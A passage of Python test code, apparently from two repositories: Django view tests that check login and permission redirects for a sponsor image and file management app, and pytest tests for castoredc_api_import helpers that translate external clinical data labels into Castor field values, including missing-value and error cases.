self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/update'.format(self.si.id), r.url)
def test_sponsor_image_update_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor image'))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 3)
self.assertEqual(str(r.content).count('</label>'), 3)
self.assertIn('Sponsor image alternative text', str(r.content))
self.assertIn('My alt', str(r.content))
self.assertIn('Sponsor image', str(r.content))
self.assertIn(self.si.img.name, str(r.content))
self.assertIn('Sponsor image description', str(r.content))
self.assertIn('My description', str(r.content))
def test_sponsor_image_update_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor image'))
self.dict['alt'] = 'My new alternative text'
self.dict['img'] = SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
r = self.client.post(reverse('dj_sponsoring:sponsor-image-update',
kwargs={'pk': self.si.id}), data=self.dict)
si = SponsorImage.objects.get(id=self.si.id)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-image-detail', kwargs={'pk': si.id}))
self.assertEqual(si.alt, 'My new alternative text')
self.assertTrue(os.path.isfile("{}/{}".format(settings.MEDIA_ROOT, si.img.name)))
class TestSponsorImageDeleteView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'sponsor': sponsor,
'img': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png'),
'alt': "My alt",
'description': "My description"
}
self.si = SponsorImage.objects.create(**self.dict)
def test_sponsor_image_delete_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/delete'.format(self.si.id), r.url)
def test_sponsor_image_delete_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/delete'.format(self.si.id), r.url)
def test_sponsor_image_delete_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/delete'.format(self.si.id), r.url)
def test_sponsor_image_delete_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/delete'.format(self.si.id), r.url)
def test_sponsor_image_delete_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor image'))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("<h1 class=\"float-left\">{}</h1>".format(self.si), str(r.content))
self.assertIn("<p>Do you really want to delete that image?</p>", str(r.content))
def test_sponsor_image_delete_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor image'))
self.assertEqual(SponsorImage.objects.count(), 1)
r = self.client.post(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}))
self.assertEqual(SponsorImage.objects.count(), 0)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-images-list', kwargs={'pk': self.si.sponsor.id}))
class TestSponsorFileListView(TestCase):
"""Tests."""
def setUp(self):
"""Setup for TestSponsorImageListView."""
self.sponsor = Sponsor.objects.create(name="Toto")
    def test_sponsor_files_list_view_empty(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-files-list', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("No files for this sponsor...", str(r.content))
    def test_sponsor_file_list_view_one_file(self):
"""Tests."""
SponsorFile.objects.create(sponsor=self.sponsor, name="My name", description="My description")
r = self.client.get(reverse('dj_sponsoring:sponsor-files-list', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn(">My name</a>", str(r.content))
class TestSponsorFileDetailView(TestCase):
"""Tests."""
def setUp(self):
"""Setup for TestSponsorImageListView."""
self.sponsor = Sponsor.objects.create(name="Toto")
def test_sponsor_file_detail_view_not_existing(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-file-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 404)
def test_sponsor_file_detail_view(self):
"""Tests."""
SponsorFile.objects.create(sponsor=self.sponsor, name="My name", description="My description")
r = self.client.get(reverse('dj_sponsoring:sponsor-file-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 200)
self.assertIn("Toto", str(r.content))
class TestSponsorFileCreateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'file': SimpleUploadedFile(name='file.txt',
content=open("tests/file.txt", 'rb').read(),
content_type='text/plain'),
'name': "My name",
'description': "My description"
}
def test_sponsor_file_create_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/files/create'.format(self.sponsor.id), r.url)
def test_sponsor_file_create_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/files/create'.format(self.sponsor.id), r.url)
def test_sponsor_file_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/files/create'.format(self.sponsor.id), r.url)
def test_sponsor_file_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/files/create'.format(self.sponsor.id), r.url)
def test_sponsor_file_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor file'))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 3)
self.assertEqual(str(r.content).count('</label>'), 3)
self.assertIn('Sponsor file name', str(r.content))
self.assertIn('Sponsor file', str(r.content))
self.assertIn('Sponsor file small description', str(r.content))
def test_sponsor_file_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor file'))
r = self.client.post(reverse('dj_sponsoring:sponsor-file-create',
kwargs={'pk': self.sponsor.id}), data=self.dict)
s = SponsorFile.objects.last()
self.assertEqual(s.name, "My name")
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-file-detail', kwargs={'pk': s.id}))
self.assertTrue(os.path.isfile(
"{}/sponsors/{}/files/{}".format(settings.MEDIA_ROOT, s.sponsor.name, self.dict['file'].name)))
class TestSponsorFileUpdateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'sponsor': sponsor,
'file': SimpleUploadedFile(name='file.txt',
content=open("tests/file.txt", 'rb').read(),
content_type='text/plain'),
'name': "My name",
'description': "My description"
}
self.sf = SponsorFile.objects.create(**self.dict)
def test_sponsor_file_update_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/update'.format(self.sf.id), r.url)
def test_sponsor_file_update_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/update'.format(self.sf.id), r.url)
def test_sponsor_file_update_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/update'.format(self.sf.id), r.url)
def test_sponsor_file_update_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/update'.format(self.sf.id), r.url)
def test_sponsor_file_update_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor file'))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 3)
self.assertEqual(str(r.content).count('</label>'), 3)
self.assertIn('Sponsor file name', str(r.content))
self.assertIn('My name', str(r.content))
self.assertIn('Sponsor file', str(r.content))
self.assertIn(self.sf.file.name, str(r.content))
self.assertIn('Sponsor file small description', str(r.content))
self.assertIn('My description', str(r.content))
def test_sponsor_file_update_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor file'))
self.dict['name'] = 'My new name'
self.dict['file'] = SimpleUploadedFile(name='file.txt',
content=open("tests/file.txt", 'rb').read(),
                                               content_type='text/plain')
r = self.client.post(reverse('dj_sponsoring:sponsor-file-update',
kwargs={'pk': self.sf.id}), data=self.dict)
sf = SponsorFile.objects.get(id=self.sf.id)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-file-detail', kwargs={'pk': sf.id}))
self.assertEqual(sf.name, 'My new name')
self.assertTrue(os.path.isfile("{}/{}".format(settings.MEDIA_ROOT, sf.file.name)))
class TestSponsorFileDeleteView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'sponsor': sponsor,
'file': SimpleUploadedFile(name='file.txt',
content=open("tests/file.txt", 'rb').read(),
content_type='text/plain'),
'name': "My name",
'description': "My description"
}
self.sf = SponsorFile.objects.create(**self.dict)
def test_sponsor_file_delete_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/delete'.format(self.sf.id), r.url)
def test_sponsor_file_delete_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/delete'.format(self.sf.id), r.url)
def test_sponsor_file_delete_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/delete'.format(self.sf.id), r.url)
def test_sponsor_file_delete_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/delete'.format(self.sf.id), r.url)
def test_sponsor_file_delete_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor file'))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("<h1 class=\"float-left\">{}</h1>".format(self.sf), str(r.content))
self.assertIn("<p>Do you really want to delete that file?</p>", str(r.content))
def test_sponsor_file_delete_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor file'))
self.assertEqual(SponsorFile.objects.count(), 1)
r = self.client.post(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}))
self.assertEqual(SponsorFile.objects.count(), 0)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-files-list', kwargs={'pk': self.sf.sponsor.id}))
[... per-file quality-signal columns omitted ...]
fc2c7a0f3dc7fb80215348c6f0e604fa473eef13 | 22,652 | py | Python | tests/test_import/test_label_translation.py | andreasCastor/castoredc_api | ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0 | ["MIT"] | null | null | null
import pytest
from castoredc_api_import.helpers import read_excel, castorize_column
class TestLabelTranslation:
"""Tests the helper functions for translation of external variable labels to Castor labels."""
    # TODO: Create tests for field types other than radio that have a dependency
@pytest.fixture(scope="class")
def study_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_study_labels.xlsx")
return dataframe
@pytest.fixture(scope="class")
def medication_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_report_medication_labels.xlsx")
return dataframe
@pytest.fixture(scope="class")
def survey_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_survey_labels.xlsx")
return dataframe
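    # castorize_column (the helper under test) maps one external data column
    # onto one or more Castor variables. Its contract, as exercised by the
    # assertions below (inferred from this test suite, not from library docs):
    # it returns a dict keyed by the names in `new_name`, with values
    # castorized element-wise -- None for missing inputs and the string
    # "Error" for labels that cannot be mapped. For example:
    #
    #     castorize_column(to_import=column, new_name=["pat_sex"],
    #                      label_data=True, study=import_study)
    #     # -> {"pat_sex": ["0", "0", "1", "1", "0"]}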
def test_record_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a record field."""
column = study_label_data["patient"]
import_column = castorize_column(
to_import=column, new_name=["record_id"], label_data=True, study=import_study
)
assert import_column == {
"record_id": ["110001", "110002", "110003", "110004", "110005"]
}
def test_checkbox_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a checkbox field."""
column = study_label_data["family disease history"]
import_column = castorize_column(
to_import=column, new_name=["his_family"], label_data=True, study=import_study
)
assert import_column == {"his_family": ["2;3;4", "1;2", "0", "5;7", "8"]}
def test_date_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a date field."""
column = study_label_data["date baseline blood sample"]
import_column = castorize_column(
to_import=column, new_name=["base_bl_date"], label_data=True, study=import_study
)
assert import_column == {
"base_bl_date": [
"16-03-2021",
"17-03-2021",
"16-03-2022",
"17-03-2022",
"16-03-2023",
]
}
def test_datetime_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a datetime field."""
column = study_label_data["datetime onset stroke"]
import_column = castorize_column(
to_import=column, new_name=["onset_stroke"], label_data=True, study=import_study
)
assert import_column == {
"onset_stroke": [
"16-03-2021;07:30",
"17-03-2021;15:30",
"18-03-2022;02:00",
"17-03-2022;21:43",
"16-03-2023;07:22",
]
}
def test_dropdown_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a dropdown field."""
column = study_label_data["patient race"]
import_column = castorize_column(
to_import=column, new_name=["pat_race"], label_data=True, study=import_study
)
assert import_column == {"pat_race": ["1", "2", "3", "4", "5"]}
def test_numberdate_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a numberdate field."""
column = study_label_data["factor V Leiden"]
import_column = castorize_column(
to_import=column, new_name=["fac_V_leiden"], label_data=True, study=import_study
)
assert import_column == {
"fac_V_leiden": [
"55;16-03-2021",
"33;17-03-2021",
"-45;18-03-2022",
"28;19-03-2022",
"5;20-03-2023",
]
}
def test_numeric_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a number field."""
column = study_label_data["baseline hemoglobin"]
import_column = castorize_column(
to_import=column, new_name=["base_hb"], label_data=True, study=import_study
)
assert import_column == {"base_hb": ["8.3", "7.2", "9.1", "3.2", "10.3"]}
def test_radio_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a radio field."""
column = study_label_data["patient sex"]
import_column = castorize_column(
to_import=column, new_name=["pat_sex"], label_data=True, study=import_study
)
assert import_column == {"pat_sex": ["0", "0", "1", "1", "0"]}
def test_radio_field_with_dependency_success(self, medication_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a radio field with a dependency."""
column = medication_label_data["units"]
import_column = castorize_column(
to_import=column,
new_name=["med_units", "med_other_unit"],
label_data=True,
study=import_study,
)
assert import_column == {
"med_units": ["3", "7", "7", "2", "2"],
"med_other_unit": [None, "mg/4 weeks", "mg/8 weeks", None, None],
}
def test_slider_field_success(self, survey_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a slider field."""
column = survey_label_data["visual analog scale"]
import_column = castorize_column(
to_import=column, new_name=["VAS"], label_data=True, study=import_study
)
assert import_column == {"VAS": ["25", "88", "13"]}
def test_string_field_success(self, medication_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a string field."""
column = medication_label_data["medication"]
import_column = castorize_column(
to_import=column, new_name=["med_name"], label_data=False, study=import_study
)
assert import_column == {
"med_name": [
"Azathioprine",
"Vedolizumab",
"Ustekinumab",
"Thioguanine",
"Tofacitinib",
]
}
def test_time_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a time field."""
column = study_label_data["time onset trombectomy"]
import_column = castorize_column(
to_import=column,
new_name=["onset_trombectomy"],
label_data=True,
study=import_study,
)
assert import_column == {
"onset_trombectomy": ["09:25", "06:33", "12:24", "23:23", "08:14"]
}
def test_year_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a year field."""
column = study_label_data["year of birth"]
import_column = castorize_column(
to_import=column, new_name=["pat_birth_year"], label_data=True, study=import_study
)
assert import_column == {
"pat_birth_year": ["1999", "1956", "1945", "1933", "1921"]
}
class TestLabelTranslationMissing:
"""Tests the helper functions for translation of external variable labels to Castor labels with missing labels."""
@pytest.fixture(scope="class")
def study_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_study_labels_missings.xlsx")
return dataframe
@pytest.fixture(scope="class")
def medication_label_data(self):
dataframe = read_excel(
"tests/test_import/data_files_for_import_tests/data_file_report_medication_labels_missings.xlsx"
)
return dataframe
@pytest.fixture(scope="class")
def survey_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_survey_labels_missings.xlsx")
return dataframe
def test_record_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a record field."""
column = study_label_data["patient"]
import_column = castorize_column(
to_import=column, new_name=["record_id"], label_data=True, study=import_study
)
assert import_column == {
"record_id": ["110001", "110002", "110003", "110004", "110005"]
}
def test_checkbox_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a checkbox field."""
column = study_label_data["family disease history"]
import_column = castorize_column(
to_import=column, new_name=["his_family"], label_data=True, study=import_study
)
assert import_column == {"his_family": [None, None, "0", "5;7", "8"]}
def test_date_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a date field."""
column = study_label_data["date baseline blood sample"]
import_column = castorize_column(
to_import=column, new_name=["base_bl_date"], label_data=True, study=import_study
)
assert import_column == {
"base_bl_date": [
"16-03-2021",
"17-03-2021",
None,
"17-03-2022",
"16-03-2023",
]
}
def test_datetime_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a datetime field."""
column = study_label_data["datetime onset stroke"]
import_column = castorize_column(
to_import=column, new_name=["onset_stroke"], label_data=True, study=import_study
)
assert import_column == {
"onset_stroke": [
None,
"17-03-2021;15:30",
"18-03-2022;02:00",
"17-03-2022;21:43",
"16-03-2023;07:22",
]
}
def test_dropdown_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a dropdown field."""
column = study_label_data["patient race"]
import_column = castorize_column(
to_import=column, new_name=["pat_race"], label_data=True, study=import_study
)
assert import_column == {"pat_race": ["1", "2", None, "4", "5"]}
def test_numberdate_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a numberdate field."""
column = study_label_data["factor V Leiden"]
import_column = castorize_column(
to_import=column, new_name=["fac_V_leiden"], label_data=True, study=import_study
)
assert import_column == {
"fac_V_leiden": [
"55;16-03-2021",
"33;17-03-2021",
"-45;18-03-2022",
None,
"5;20-03-2023",
]
}
def test_numeric_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a number field."""
column = study_label_data["baseline hemoglobin"]
import_column = castorize_column(
to_import=column, new_name=["base_hb"], label_data=True, study=import_study
)
assert import_column == {"base_hb": ["8.3", None, "9.1", "3.2", "10.3"]}
def test_radio_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a radio field with missings."""
column = study_label_data["patient sex"]
import_column = castorize_column(
to_import=column, new_name=["pat_sex"], label_data=True, study=import_study
)
assert import_column == {"pat_sex": ["0", "0", None, "1", "0"]}
def test_radio_field_with_dependency_missing(self, medication_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a radio field with a dependency and missings."""
column = medication_label_data["units"]
import_column = castorize_column(
to_import=column,
new_name=["med_units", "med_other_unit"],
label_data=True,
study=import_study,
)
assert import_column == {
"med_units": ["3", None, "7", "2", None],
"med_other_unit": [None, None, "mg/8 weeks", None, None],
}
def test_slider_field_missing(self, survey_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a slider field with missings."""
column = survey_label_data["visual analog scale"]
import_column = castorize_column(
to_import=column, new_name=["VAS"], label_data=True, study=import_study
)
assert import_column == {"VAS": ["25", None, "13"]}
def test_string_field_missing(self, medication_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a string field."""
column = medication_label_data["medication"]
import_column = castorize_column(
to_import=column, new_name=["med_name"], label_data=False, study=import_study
)
assert import_column == {
"med_name": ["Azathioprine", None, None, "Thioguanine", "Tofacitinib"]
}
def test_time_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a time field."""
column = study_label_data["time onset trombectomy"]
import_column = castorize_column(
to_import=column,
new_name=["onset_trombectomy"],
label_data=True,
study=import_study,
)
assert import_column == {
"onset_trombectomy": ["09:25", "06:33", "12:24", None, "08:14"]
}
def test_year_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a year field."""
column = study_label_data["year of birth"]
import_column = castorize_column(
to_import=column, new_name=["pat_birth_year"], label_data=True, study=import_study
)
assert import_column == {"pat_birth_year": ["1999", None, None, None, "1921"]}
class TestLabelTranslationFail:
"""Tests the helper functions for translation of erronous external variable labels to Castor labels."""
@pytest.fixture(scope="class")
def study_label_data_error(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_study_labels_errors.xlsx")
return dataframe
@pytest.fixture(scope="class")
def medication_label_data_error(self):
dataframe = read_excel(
"tests/test_import/data_files_for_import_tests/data_file_report_medication_labels_errors.xlsx"
)
return dataframe
@pytest.fixture(scope="class")
def survey_label_data_error(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_survey_labels_errors.xlsx")
return dataframe
def test_record_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a record field."""
column = study_label_data_error["patient"]
import_column = castorize_column(
to_import=column, new_name=["record_id"], label_data=True, study=import_study
)
# Record checking fails at the import stage
assert import_column == {"record_id": ["a", "b", "c", "d", "e"]}
def test_checkbox_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a checkbox field."""
column = study_label_data_error["family disease history"]
import_column = castorize_column(
to_import=column, new_name=["his_family"], label_data=True, study=import_study
)
assert import_column == {
"his_family": [
"Error;Error;Error",
"Error",
"Error",
"Error;Error;Error",
"Error",
]
}
def test_date_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a date field."""
column = study_label_data_error["date baseline blood sample"]
import_column = castorize_column(
to_import=column, new_name=["base_bl_date"], label_data=True, study=import_study
)
assert import_column == {
"base_bl_date": ["Error", "Error", "Error", "Error", "Error"]
}
def test_datetime_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a datetime field."""
column = study_label_data_error["datetime onset stroke"]
import_column = castorize_column(
to_import=column, new_name=["onset_stroke"], label_data=True, study=import_study
)
assert import_column == {
"onset_stroke": ["Error", "Error", "Error", "Error", "Error"]
}
def test_dropdown_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a dropdown field."""
column = study_label_data_error["patient race"]
import_column = castorize_column(
to_import=column, new_name=["pat_race"], label_data=True, study=import_study
)
assert import_column == {
"pat_race": ["Error", "Error", "Error", "Error;Error", "Error"]
}
def test_numberdate_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a numberdate field."""
column = study_label_data_error["factor V Leiden"]
import_column = castorize_column(
to_import=column, new_name=["fac_V_leiden"], label_data=True, study=import_study
)
assert import_column == {
"fac_V_leiden": [
"Error",
"33;Error",
"Error;18-03-2022",
"28;Error",
"5;02-03-2023",
]
}
def test_numeric_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a number field."""
column = study_label_data_error["baseline hemoglobin"]
import_column = castorize_column(
to_import=column, new_name=["base_hb"], label_data=True, study=import_study
)
assert import_column == {
"base_hb": ["Error", "Error", "Error", "Error", "Error"]
}
def test_radio_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a radio field."""
column = study_label_data_error["patient sex"]
import_column = castorize_column(
to_import=column, new_name=["pat_sex"], label_data=True, study=import_study
)
assert import_column == {
"pat_sex": ["Error", "Error", "Error", "Error", "Error"]
}
def test_radio_field_with_dependency_fail(self, medication_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a radio field with a dependency."""
column = medication_label_data_error["units"]
import_column = castorize_column(
to_import=column,
new_name=["med_units", "med_other_unit"],
label_data=True,
study=import_study,
)
assert import_column == {
"med_units": ["7", "7", "7", "7", "7"],
"med_other_unit": ["also", "not wrong", "because", "text", "dependency"],
}
def test_slider_field_fail(self, survey_label_data_error, import_study):
"""Tests whether the proper format is returned when castorizing a slider field with errors."""
column = survey_label_data_error["visual analog scale"]
import_column = castorize_column(
to_import=column, new_name=["VAS"], label_data=True, study=import_study
)
assert import_column == {"VAS": ["Error", "Error", "Error"]}
def test_string_field_fail(self, medication_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a string field."""
column = medication_label_data_error["medication"]
import_column = castorize_column(
to_import=column, new_name=["med_name"], label_data=False, study=import_study
)
assert import_column == {"med_name": ["cant", "be", "wrong", "cuz", "text"]}
def test_time_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a time field."""
column = study_label_data_error["time onset trombectomy"]
import_column = castorize_column(
to_import=column,
new_name=["onset_trombectomy"],
label_data=True,
study=import_study,
)
assert import_column == {
"onset_trombectomy": ["Error", "Error", "Error", "Error", "Error"]
}
def test_year_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a year field."""
column = study_label_data_error["year of birth"]
import_column = castorize_column(
to_import=column, new_name=["pat_birth_year"], label_data=True, study=import_study
)
assert import_column == {
"pat_birth_year": ["Error", "Error", "Error", "Error", "Error"]
}
[... per-file quality-signal columns omitted ...]
